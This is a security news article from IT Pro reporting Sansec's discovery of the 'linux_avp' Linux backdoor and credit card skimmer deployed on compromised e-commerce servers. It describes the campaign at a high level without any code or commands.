IT Pro is supported by its audience. When you purchase through links on our site, we may earn an affiliate commission. Learn more

Hackers use Linux backdoor on compromised e-commerce sites with software skimmer

Cyber criminals in China control the malware

Small shopping cart on a keyboard

Security researchers have revealed a new hacking campaign that installs a Linux backdoor on compromised e-commerce sites after deploying a credit card skimmer on merchant websites.

Researchers from the Sansec Threat Research Team discovered a new malicious agent “linux_avp” that hides as a system process on e-commerce servers. They said hackers have been deploying this malware worldwide since last week, and it takes commands from a control server in Beijing.

In the campaign, hackers started automated e-commerce attack probes, testing for dozens of weaknesses in common online store platforms.

“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a webshell and modified the server code to intercept customer data,” said researchers.

Researchers said hackers then uploaded the linux_avp malware, which is a Golang program that starts, removes itself from disk, and disguises as a fake ps -ef process.

“Analysis of linux_avp suggests that it serves as a backdoor, waiting for commands from a Beijing (Alibaba) hosted server,” said researchers. The backdoor also revealed where the user, known as "dob" built the backdoor in a project folder lin_avp, using code name GREECE.

Related Resource

Protecting every edge to make hackers’ jobs harder, not yours

How to support and secure hybrid architectures

White square with whitepaper title on top of a background image of a building and pavementFree download

The malware also injects a malicious crontab entry to ensure access in case that the process is removed or the server rebooted. The crontab downloads the Golang malware executable to a random writable directory and installs two configuration files. “One contains a public key, which is presumably used to ensure that no one, but the malware owner can launch commands,” researchers added.

This case has another Chinese connection, according to researchers, as a line was added to the e-commerce platform code called app/design/frontend/favicon_absolute_top.jpg, which contains PHP code to retrieve a fake payment form and inject it in the store. Researchers said the IP for this was hosted in Hong Kong and was previously observed as a skimming exfiltration endpoint in July and August of this year.

Researchers said, at the time of writing, no other antivirus vendor had recognized the malware.

“Curiously, one individual had submitted the same malware to Virustotal on Oct 8th with the comment “test”. This was just one day after the successful breach of our customer’s store,” said researchers.

They added that the person uploading the malware could very well be the malware author, who wanted to assert that common antivirus engines will not detect their creation.

Featured Resources

Four strategies for building a hybrid workplace that works

All indications are that the future of work is hybrid, if it's not here already

Free webinar

The digital marketer’s guide to contextual insights and trends

How to use contextual intelligence to uncover new insights and inform strategies

Free Download

Ransomware and Microsoft 365 for business

What you need to know about reducing ransomware risk

Free Download

Building a modern strategy for analytics and machine learning success

Turning into business value

Free Download

Recommended

RATDispenser evades nine in ten anti-virus engines
Security

RATDispenser evades nine in ten anti-virus engines

24 Nov 2021
Iranian hackers ramp up attacks against IT services sector
hacking

Iranian hackers ramp up attacks against IT services sector

19 Nov 2021
TikTok phishing campaign tried to scam over 125 influencer accounts
social media

TikTok phishing campaign tried to scam over 125 influencer accounts

18 Nov 2021
Out-of-hours ransomware attacks have a greater impact on revenue
ransomware

Out-of-hours ransomware attacks have a greater impact on revenue

18 Nov 2021

Most Popular

Windows Server admins say latest Patch Tuesday broke authentication policies
Server & storage

Windows Server admins say latest Patch Tuesday broke authentication policies

12 May 2022
Russian hackers declare war on 10 countries after failed Eurovision DDoS attack
hacking

Russian hackers declare war on 10 countries after failed Eurovision DDoS attack

16 May 2022
IT admin deletes company’s databases and is jailed for seven years
Policy & legislation

IT admin deletes company’s databases and is jailed for seven years

16 May 2022